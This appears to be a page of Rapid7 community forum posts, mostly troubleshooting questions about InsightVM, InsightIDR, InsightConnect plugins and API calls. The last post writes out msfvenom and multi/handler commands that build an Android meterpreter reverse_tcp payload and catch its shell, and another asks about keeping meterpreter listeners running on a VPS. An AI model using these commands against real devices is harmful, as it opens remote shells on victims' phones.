Hi there, Wondering if anyone has looked down this avenue before. I'm looking to know if there's a way to use the data in InsightIDR to find PCs which have shares which are shared to 'everyone'. Whilst investigating an issue I've ended up down a rabbit hole and discovered some employees sharing entire drives out to everyone, and I'm trying to get an understanding of how widescale this might be across endpoint systems. Assuming all the endpoints have the InsightAgent, has anyone got suggestions on how to search by open shares? Would that get reported back into InsightIDR? I also have InsightVM, so I'm not sure if that's an alternative avenue to look with? Thanks in advance.
Posted by Paul Deasy 20 days ago
Hi All, We are getting a credentials failure on port 135 when performing a VA scan on a Windows server. We are able to access the server on port 135 from the scan engine, but we are still getting a credential failure on port 135, while the credentials succeed on port 445. Kindly let us know the resolution to get the credentials to succeed on port 135. Thanks in advance.
Posted by Ajay 20 days ago
Hi All, Do share the SQL query to get the CSV report stating server IP, hostname, OS, vulnerability, severity and port number on which the vulnerability exists. I tried all the queries but none has worked; please do share if any. Thanks in advance.
Posted by Ajay 20 days ago
Hi all, I have just installed Rapid7 (NexPose) for scanning with a trial license. However, when I start to scan one asset, I have this error:

```
Failed (java.io.IOException: The Nmap exit value is not zero: 1
    at com.rapid7.nexpose.scan.nmap.Nmap.start(Unknown Source)
    at com.rapid7.nexpose.scan.nmap.Nmap.run(Unknown Source)
    at com.rapid7.nexpose.scan.Scan.start(Unknown Source)
    at com.rapid7.nexpose.scan.Scan.run(Unknown Source)
    at java.lang.Thread.run(Thread.java:748)
)
```

I'm trying many ways but it does not seem to work! Please help me!
Posted by Pham Anh Khoa 21 days ago
I run a scan against 6 IPs, the assets scanned box comes up, gives me a percentage, and while it's scanning says 5 vulnerabilities, and 6 IPs... cool, okay. I wait, it finishes, and I check the scan: NO VULNERABILITIES, and all the assets have incomplete?? What is going on??!! I spend more time putting cases in to Rapid7 than I do actually working the application...
Posted by Vanessa villalpando 24 days ago
Hi folks, I get a 404 error when running the VirusTotal plugin. I tested curling VirusTotal on my Insight Orchestrator directly by using Python, and it is working. InsightConnect made a request to the URL "https://www.virustotal.com/vtapi/v2/url/scan/url/scan", but this is wrong. The correct URL is "https://www.virustotal.com/vtapi/v2/url/scan"; there is no need for url/scan twice. This URL is not what I configured. I think this is the cause of the issue. Somebody help me please. Regards,

```
Connect: Connecting...
rapid7/VirusTotal:5.0.0. Step name: scan_url
Making request to VirusTotal endpoint https://www.virustotal.com/vtapi/v2/url/scan/url/scan
Error: Unable to decode response to JSON
Received: <html>
<head>
<title>404 Not Found</title>
</head>
<body>
<h1>404 Not Found</h1>
The resource could not be found.<br /><br />
</body>
</html>
Error: Received an unexpected response from VirusTotal (non-JSON response was received). If the issue persists please contact support.
Traceback (most recent call last):
  File "/usr/local/lib/python3.7/site-packages/virustotal_rapid7_plugin-5.0.0-py3.7.egg/komand_virustotal/connection/connection.py", line 66, in request
    jdata = resp.json()
  File "/usr/local/lib/python3.7/site-packages/requests-2.22.0-py3.7.egg/requests/models.py", line 897, in json
    return complexjson.loads(self.text, **kwargs)
  File "/usr/local/lib/python3.7/json/__init__.py", line 348, in loads
    return _default_decoder.decode(s)
  File "/usr/local/lib/python3.7/json/decoder.py", line 337, in decode
    obj, end = self.raw_decode(s, idx=_w(s, 0).end())
  File "/usr/local/lib/python3.7/json/decoder.py", line 355, in raw_decode
    raise JSONDecodeError("Expecting value", s, err.value) from None
json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.7/site-packages/komand-1.0.1-py3.7.egg/komand/plugin.py", line 311, in handle_step
    output = self.start_step(input_message['body'], 'action', logger, log_stream, is_test, is_debug)
  File "/usr/local/lib/python3.7/site-packages/komand-1.0.1-py3.7.egg/komand/plugin.py", line 419, in start_step
    output = func(params)
  File "/usr/local/lib/python3.7/site-packages/virustotal_rapid7_plugin-5.0.0-py3.7.egg/komand_virustotal/actions/scan_url/action.py", line 18, in run
    data = self.connection.request(url=url, method="post", params=r_params)
  File "/usr/local/lib/python3.7/site-packages/virustotal_rapid7_plugin-5.0.0-py3.7.egg/komand_virustotal/connection/connection.py", line 78, in request
    "Error: Received an unexpected response from VirusTotal "
komand.exceptions.ServerException: Error: Received an unexpected response from VirusTotal (non-JSON response was received). If the issue persists please contact support.
```
Posted by Shotaro 24 days ago
Hi, Insight VM was recently configured to scan our AWS environment; however, I'm unable to find, either from supporting documentation, the archive reports area or the reports feature, how to extract the details for any of these findings. Is it possible to extract reports for the cloud configuration scan findings? Thanks
Posted by Kevin Pendred 24 days ago
Hi folks, Although my mail server receives the e-mail, the IMAP plugin trigger is not working. I made a simple workflow in InsightConnect as follows.

1. trigger: receive email from IMAP by using IMAP plugin
2. action: extract URL from body by using Parse URLs
3. ChatOps: post message to my Slack account

Running the workflow succeeds, but the trigger never happens. In the mail server logs, I can confirm the InsightOrchestrator can access my mail server well. (192.168.11.144 is the InsightOrchestrator and 140 is my mail server.) The save location of e-mail is /home/testuser01/Maildir. I guess InsightOrchestrator can't reach /home/testuser01/Maildir. Any ideas?

```
[mail server logs]
Sep 20 11:19:58 c140 dovecot: imap(testuser01): Connection closed (SELECT finished 0.039 secs ago) in=22 out=434
Sep 20 11:20:04 c140 dovecot: imap-login: Login: user=<testuser01>, method=PLAIN, rip=192.168.11.144, lip=192.168.11.140, mpid=7602, session=<JeZHtfKSguPAqAuQ>
Sep 20 11:20:04 c140 dovecot: imap(testuser01): Connection closed (SELECT finished 0.037 secs ago) in=22 out=434
```
Posted by Shotaro 24 days ago
Isn't updating to a new version supposed to shut down the console? I am trying to upgrade the console and it looks as if some patches are going. How do I know if it's taking place?? If I try to run it again it says process updating, but it gave me that the first time? The update seems like it's broken, it always throws back a message just does it.
Posted by Vanessa villalpando 25 days ago
Hi everybody, Has anyone already scanned images on OpenShift with InsightVM? Tried uploading the "R7 scanning container" on OpenShift, but authentication on the registry fails... Most probably something done wrong... Contacted R7 support, but they say that they do not... support this case. Any experience to share? tx in advance,
Posted by Luc Poelmans 25 days ago
Hi, I successfully installed Insight Orchestrator and got an activation key on my CentOS7. But activation doesn't complete. It seems that the "Activating,,," status lasts forever. The "/opt/rapid7/orchestrator/var/log/orchestrator.log" shows nothing. Any ideas? Regards,
Posted by Shotaro 26 days ago
Hi folks, I installed InsightConnect by using the OVA file. I have successfully installed it, but I don't know what the default root password is. I only get a user name and password in the install manual. Regards,
Posted by Shotaro 26 days ago
I have a VPS running my meterpreter listeners, and every time I have a session, I basically also need to keep the ssh session alive, which means that I would also need to have my personal rig on 24/7. Is it possible to not have a session die when I exit the SSH session? Thanks for any advice.
Posted by zek guni 28 days ago
Hello everybody, I have tried to make a GET request in Python using the Rapid7 API, but unfortunately I have received a 401 error code, which means that there is something wrong with my authentication. I have passed the credentials as a normal string and also as an encoded string (as it is written in the API docs); unfortunately the result is still the same. This is my code:

```
import requests
import json
import base64

enc = "<login>:<pass>"
encodedBytes = base64.b64encode(enc.encode("utf-8"))
encodedStr = str(encodedBytes, "utf-8")
data = [
    ('Accept', 'application/json'),
    ('Authorization', <encoded string>),
    ('Accept-Language', 'en-US'),
]
response = requests.get('https://<ip>:<port>/api/3/assets', data = data,verify=False)
responsejson = json.loads(response.text)
print(response)
```
Posted by Vato 29 days ago
Hello! Is it possible to scan for all open network shares on a machine? I noticed there is a files and directories section on the asset page but it doesn't provide any network locations, only local system. Is it possible to configure this to scan all shares the machine can connect to if the drive is mapped? I want to run an SMB share audit using Rapid7. -Alex
Posted by Alex Gilbert about a month ago
First of all, I'm a beginner in Metasploit. Sorry if anyone asked this question before. My problem is that when I create an android meterpreter reverse_tcp payload, start the listener, install and run the app on an android device, the session "freezes" and the meterpreter session is not showing up. It's not quitting and showing the exploit(multi/handler). It just drops an empty line. On Windows it's working perfectly. I read that the session is in the background, but none of the commands "sessions -l" or "sessions -i <id>" are working.

My commands:

APK:

* msfvenom -p android/meterpreter/reverse_tcp LHOST=MY_IP LPORT=1234 R > /location/path
* then I sign it with jarsigner

Listener:

* msfconsole
* use exploit/multi/handler
* set LHOST MY_IP
* set LPORT 1234
* set payload android/meterpreter/reverse_tcp
* exploit

When I open the app on the device, Metasploit says:

```
Started reverse TCP handler on 192.168.100.100:1234
Sending stage (72445 bytes) to 192.168.100.101
Meterpreter session 4 opened (192.168.100.100:1234 -> 192.168.100.101:46925) at 2019-08-18 16:01:43 -0500
```
Posted by Bence Varga about a month ago